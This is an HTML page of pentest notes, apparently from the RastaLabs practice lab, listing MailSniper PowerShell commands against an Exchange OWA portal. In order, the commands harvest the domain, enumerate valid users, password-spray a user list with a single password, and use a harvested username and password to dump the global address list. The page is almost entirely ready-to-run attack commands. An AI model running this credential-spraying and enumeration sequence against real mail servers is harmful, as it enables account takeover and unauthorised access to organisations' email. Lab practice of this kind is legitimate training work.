<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Mail Sniper</title>
</head><body><b><u><span style="font-size: 12pt">This will gather the domain name - Keep in mind, you may want to run this twice to verify results</span></u></b><br/>
<br/>
Invoke-DomainHarvestOWA -ExchHostname &lt;ip or url&gt; -DomainList &lt;domain list file&gt; -Outfile &lt;output file&gt;<br/>
<br/>
Invoke-DomainHarvestOWA -ExchHostname "10.10.110.254" -DomainList .\domains.txt -brute &nbsp;&lt;----this is rastalabs<br/>
<br/>
<br/>
<br/>
<b><u><span style="font-size: 12pt"><br/>
</span></u></b><b><u><span style="font-size: 12pt">This will check for valid domain users on the Domain after you gather a pre-generated username list</span></u></b><br/>
<br/>
Invoke-UsernameHarvestOWA -ExchHostname "10.10.110.254" -UserList .\email_addys.txt -Domain rastalabs.local<br/>
<br/>
<b><u><span style="font-size: 14pt"><br/>
<br/>
</span></u></b><b><u><span style="font-size: 14pt">This will spray the OWA portal against a valid userlist with a singular password</span></u></b><br/>
<br/>
Invoke-PasswordSprayOWA -ExchHostname "10.10.110.254" -Domain rastalabs.local -UserList .\email_addys.txt -Password Labrador1<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<b><u><span style="font-size: 14pt">This will use a harvested credential to get a global-address list</span></u></b><br/>
<br/>
Get-GlobalAddressList -ExchHostname "10.10.110.254" -UserName rastalabs.local\ahope -Password Spring2017 -OutFile test.txt<br/>
<br/>
</body></html>